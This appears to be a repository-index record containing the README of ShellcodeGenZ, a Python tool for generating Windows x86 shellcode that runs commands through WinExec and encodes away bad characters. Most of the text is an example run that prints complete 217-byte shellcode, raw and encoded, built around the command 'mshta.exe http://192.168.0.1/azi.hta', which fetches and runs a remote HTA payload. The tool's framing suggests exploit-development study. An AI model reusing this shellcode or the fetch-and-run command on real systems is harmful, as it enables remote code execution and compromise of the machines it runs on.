{"id":27779349,"url":"https://github.com/zeyad-azima/shellcodegenz","last_synced_at":"2025-09-23T06:49:09.087Z","repository":{"id":290254999,"uuid":"973809453","full_name":"Zeyad-Azima/ShellcodeGenZ","owner":"Zeyad-Azima","description":"GenZ Shellcode Generator to execute commands with winExec API","archived":false,"fork":false,"pushed_at":"2025-04-27T20:28:27.000Z","size":29,"stargazers_count":20,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-07-17T09:56:34.324Z","etag":null,"topics":["exploitation","metasploit","osed","shellcode","shellcode-development"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Zeyad-Azima.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-04-27T19:27:53.000Z","updated_at":"2025-05-13T10:24:09.000Z","dependencies_parsed_at":"2025-04-27T21:38:42.024Z","dependency_job_id":null,"html_url":"https://github.com/Zeyad-Azima/ShellcodeGenZ","commit_stats":null,"previous_names":["zeyad-azima/shellcodegenz"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Zeyad-Azima/ShellcodeGenZ","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zeyad-Azima%2FShellcodeGenZ","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zeyad-Azima%2FShellcodeGenZ/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zeyad-Azima%2FShellcodeGenZ/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zeyad-Azima%2FShellcodeGenZ/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Zeyad-Azima","download_url":"https://codeload.github.com/Zeyad-Azima/ShellcodeGenZ/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zeyad-Azima%2FShellcodeGenZ/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":276531303,"owners_count":25658697,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-23T02:00:09.130Z","response_time":73,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploitation","metasploit","osed","shellcode","shellcode-development"],"created_at":"2025-04-30T09:58:09.106Z","updated_at":"2025-09-23T06:49:09.069Z","avatar_url":"https://github.com/Zeyad-Azima.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n# ShellcodeGenZ\n![image](https://github.com/user-attachments/assets/8ba517e4-acfd-4162-9720-fe8ec78af641)\n![image](https://github.com/user-attachments/assets/8984c1dc-53f4-4f5b-b887-653461ee312e)\n\nYo, welcome to ShellcodeGenZ, the dopest shellcode generator for commands, crafted by Zeyad Azima (https://zeyadazima.com - contact@zeyadazima.com). This tool's straight-up slayin' the game by whippin' up clean shellcode, yeetin' bad chars like nobody's biz, and droppin' logs so you know what's poppin'. Built with Gen-Z energy, it's got manual and auto modes to fix bad chars, checks for 0x00 like a boss, and keeps the vibes no cap. This is your go-to for shellcode that slaps.\n\n## What's the Vibe?\n\nShellcodeGenZ takes your commands (like mshta.exe http://192.168.0.1/azi.hta) and turns 'em into shellcode that's ready to flex. It hunts down bad chars (like 0x0a, 0x0b, or the default 0x00), lets you yeet 'em manually or auto with add/subtract offsets, and logs every move so you're never lost. If 0x00 sneaks into push instructions, it's a hard pass—script's outtie. With colored output and Gen-Z slang, it's like codin' with your besties.\n\n## Features That Slap\n- Shellcode Gen: Turns commands into lit shellcode.\n- Bad Char Yeeter: Spots bad chars and lets you fix 'em ( encode ) manual (pick your hex) or auto (add/subtract offsets).\n- Manual Offset Drip: Choose your own offset for auto mode, or let it test 0x01 to 0xff.\n- 0x00 Check: Always yeets 0x00 and bails if it's in push instructions and the whole shellcode.\n- Logs for Days: Detailed logs with Gen-Z flair so you know what's good.\n- Colorful Vibes: Rockin' colorama for that terminal glow-up.\n\n## Gettin' Set Up\n\nTo dodge the externally-managed-environment drama, we settin' up a virtual env. Here's the tea:\n\n1. Make a Virtual Env:\n   ```bash\n   python3 -m venv venv\n   source venv/bin/activate\n   ```\n\n2. Snag the Dependencies:\n   ```bash\n   pip install keystone-engine colorama\n   ```\n\n3. Grab the Script:\n   Clone this repo or yoink shellcode_genz.py from the files.\n\n4. Yeet the Env (When Done):\n   ```bash\n   deactivate\n   ```\n\n## How to Slay with ShellcodeGenZ\n\n1. Run the Script:\n   Fire it up in your virtual env:\n   ```bash\n   python3 ShellcodeGenZ.py\n   ```\n\n2. Drop Your Inputs:\n   - mshta command: Like mshta.exe http://192.168.0.1/azi.hta.\n   - Bad chars: Comma-separated hex (e.g., 0a,0b). It always checks 0x00, no cap.\n\n3. Yeet Bad Chars:\n   - If bad chars pop up, choose to yeet 'em (Y/N).\n   - Pick manual (drop new hex values) or automated (add/subtract offsets).\n   - For auto, select manual offset (like 01) or automatic (tests all offsets).\n\n4. Check the Output:\n   - Shellcode drops as a byte string (e.g., b\"\\x...\\\").\n   - Logs spill the tea on every step, from instructions to bad char fixes.\n\n### Example Run\n\nInput:\n```\nShellcodeGenZ by: Zeyad Azima ( https://zeyadazima.com - contact@zeyadazima.com ) - let's get this shellcode poppin'!\nDrop your mshta command to make it lit: mshta.exe https://192.168.0.1/azi.h1\nSpill the bad chars to yeet (comma vibes, like '0a,0b'): 01,20,80,81\n```\n\nOutput (shortened for vibes):\n```\n2025-04-28 03:11:20,452 - INFO - mshta instructions are straight fire:\npush 0x31682e69;\npush 0x7a612f31;\npush 0x2e302e38;\npush 0x36312e32;\npush 0x39312f2f;\npush 0x3a737074;\npush 0x74682065;\npush 0x78652e61;\npush 0x7468736d;\n2025-04-28 03:11:20,454 - INFO - mshta shellcode’s droppin’ like a banger: shellcode = b\"\\x89\\xe5\\x81\\xc4\\xf0\\xf9\\xff\\xff\\x31\\xc9\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x5e\\x08\\x8b\\x7e\\x20\\x8b\\x36\\x66\\x39\\x4f\\x18\\x75\\xf2\\xeb\\x06\\x5e\\x89\\x75\\x04\\xeb\\x54\\xe8\\xf5\\xff\\xff\\xff\\x60\\x8b\\x43\\x3c\\x8b\\x7c\\x03\\x78\\x01\\xdf\\x8b\\x4f\\x18\\x8b\\x47\\x20\\x01\\xd8\\x89\\x45\\xfc\\xe3\\x36\\x49\\x8b\\x45\\xfc\\x8b\\x34\\x88\\x01\\xde\\x31\\xc0\\x99\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x24\\x75\\xdf\\x8b\\x57\\x24\\x01\\xda\\x66\\x8b\\x0c\\x4a\\x8b\\x57\\x1c\\x01\\xda\\x8b\\x04\\x8a\\x01\\xd8\\x89\\x44\\x24\\x1c\\x61\\xc3\\x68\\x98\\xfe\\x8a\\x0e\\xe8\\xa7\\xff\\xff\\xff\\x89\\x45\\x12\\x68\\x83\\xb9\\xb5\\x78\\xe8\\x9a\\xff\\xff\\xff\\x89\\x45\\x16\\x31\\xc9\\x51\\x68\\x69\\x2e\\x68\\x31\\x68\\x31\\x2f\\x61\\x7a\\x68\\x38\\x2e\\x30\\x2e\\x68\\x32\\x2e\\x31\\x36\\x68\\x2f\\x2f\\x31\\x39\\x68\\x74\\x70\\x73\\x3a\\x68\\x65\\x20\\x68\\x74\\x68\\x61\\x2e\\x65\\x78\\x68\\x6d\\x73\\x68\\x74\\x54\\x5b\\x31\\xc9\\x51\\x53\\xff\\x55\\x12\\x31\\xc9\\x51\\x6a\\xff\\xff\\x55\\x16\"!\n2025-04-28 03:11:20,454 - INFO - Shellcode’s flexin’ at 217 bytes, no cap!\n2025-04-28 03:11:20,454 - WARNING - Caught bad char 0x81 lurkin’ at index 2! Sus vibes.\n2025-04-28 03:11:20,454 - INFO - Nearby byte be like: 0x81\n2025-04-28 03:11:20,454 - WARNING - Caught bad char 0x20 lurkin’ at index 25! Sus vibes.\n2025-04-28 03:11:20,454 - INFO - Nearby byte be like: 0x20\n2025-04-28 03:11:20,454 - WARNING - Caught bad char 0x01 lurkin’ at index 55! Sus vibes.\n2025-04-28 03:11:20,454 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,454 - WARNING - Caught bad char 0x20 lurkin’ at index 62! Sus vibes.\n2025-04-28 03:11:20,454 - INFO - Nearby byte be like: 0x20\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x01 lurkin’ at index 63! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x01 lurkin’ at index 77! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x01 lurkin’ at index 91! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x01 lurkin’ at index 104! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x01 lurkin’ at index 113! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x01 lurkin’ at index 118! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x01\n2025-04-28 03:11:20,455 - WARNING - Caught bad char 0x20 lurkin’ at index 187! Sus vibes.\n2025-04-28 03:11:20,455 - INFO - Nearby byte be like: 0x20\nWanna yeet those bad chars? (Y/N): Y\nYou goin’ manual or auto for yeetin’ bad chars? (manual/automated): automated\nYo, what’s the move? Add or subtract for encodin’? (add/subtract): add\nYou droppin’ your own offset or we auto-pickin’? (manual/automatic): automatic\n2025-04-28 03:11:51,821 - INFO - Kickin’ off bad char yeetin’ with add vibes and automatic offset slay\n2025-04-28 03:11:51,821 - INFO - Bad chars we gotta yeet: 0x01, 0x20, 0x81\n2025-04-28 03:11:51,821 - INFO - Chars we dodgin’: 0x01, 0x20, 0x80, 0x81, 0x00\n2025-04-28 03:11:51,822 - INFO - Goin’ auto mode, testin’ offsets 0x01 to 0xff like a boss!\n2025-04-28 03:11:51,822 - INFO - Dippin’ past offset 0x01 ‘cause it’s a bad char\n2025-04-28 03:11:51,822 - INFO - Checkin’ offset 0x02... let’s see if it slaps\n2025-04-28 03:11:51,822 - INFO -   Bad char 0x01 turnin’ into 0x03 (add 0x02)\n2025-04-28 03:11:51,822 - INFO -   Bad char 0x20 turnin’ into 0x22 (add 0x02)\n2025-04-28 03:11:51,822 - INFO -   Bad char 0x81 turnin’ into 0x83 (add 0x02)\n2025-04-28 03:11:51,822 - INFO - YO, offset 0x02 is straight fire for add!\n2025-04-28 03:11:51,822 - INFO - Replacements droppin’: 0x01 -\u003e 0x03, 0x20 -\u003e 0x22, 0x81 -\u003e 0x83\n2025-04-28 03:11:51,822 - INFO - Shellcode’s lookin’ fresh with new vibes: shellcode = b\"\\x89\\xe5\\x83\\xc4\\xf0\\xf9\\xff\\xff\\x31\\xc9\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x5e\\x08\\x8b\\x7e\\x22\\x8b\\x36\\x66\\x39\\x4f\\x18\\x75\\xf2\\xeb\\x06\\x5e\\x89\\x75\\x04\\xeb\\x54\\xe8\\xf5\\xff\\xff\\xff\\x60\\x8b\\x43\\x3c\\x8b\\x7c\\x03\\x78\\x03\\xdf\\x8b\\x4f\\x18\\x8b\\x47\\x22\\x03\\xd8\\x89\\x45\\xfc\\xe3\\x36\\x49\\x8b\\x45\\xfc\\x8b\\x34\\x88\\x03\\xde\\x31\\xc0\\x99\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x03\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x24\\x75\\xdf\\x8b\\x57\\x24\\x03\\xda\\x66\\x8b\\x0c\\x4a\\x8b\\x57\\x1c\\x03\\xda\\x8b\\x04\\x8a\\x03\\xd8\\x89\\x44\\x24\\x1c\\x61\\xc3\\x68\\x98\\xfe\\x8a\\x0e\\xe8\\xa7\\xff\\xff\\xff\\x89\\x45\\x12\\x68\\x83\\xb9\\xb5\\x78\\xe8\\x9a\\xff\\xff\\xff\\x89\\x45\\x16\\x31\\xc9\\x51\\x68\\x69\\x2e\\x68\\x31\\x68\\x31\\x2f\\x61\\x7a\\x68\\x38\\x2e\\x30\\x2e\\x68\\x32\\x2e\\x31\\x36\\x68\\x2f\\x2f\\x31\\x39\\x68\\x74\\x70\\x73\\x3a\\x68\\x65\\x22\\x68\\x74\\x68\\x61\\x2e\\x65\\x78\\x68\\x6d\\x73\\x68\\x74\\x54\\x5b\\x31\\xc9\\x51\\x53\\xff\\x55\\x12\\x31\\xc9\\x51\\x6a\\xff\\xff\\x55\\x16\"!\n2025-04-28 03:11:51,823 - INFO - New shellcode length’s poppin’ off at 217 bytes!\nShellcodeGenZ by: Zeyad Azima ( https://zeyadazima.com - contact@zeyadazima.com ) - we slayed it, fam!\n```\n\n## Got Tea?\n\nWanna add more drip, report a bug, or just vibe? Hit up the issues tab or slide into Zeyad’s DMs at contact@zeyadazima.com. Let’s keep ShellcodeGenZ the most lit shellcode tool in the game.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzeyad-azima%2Fshellcodegenz","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzeyad-azima%2Fshellcodegenz","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzeyad-azima%2Fshellcodegenz/lists"}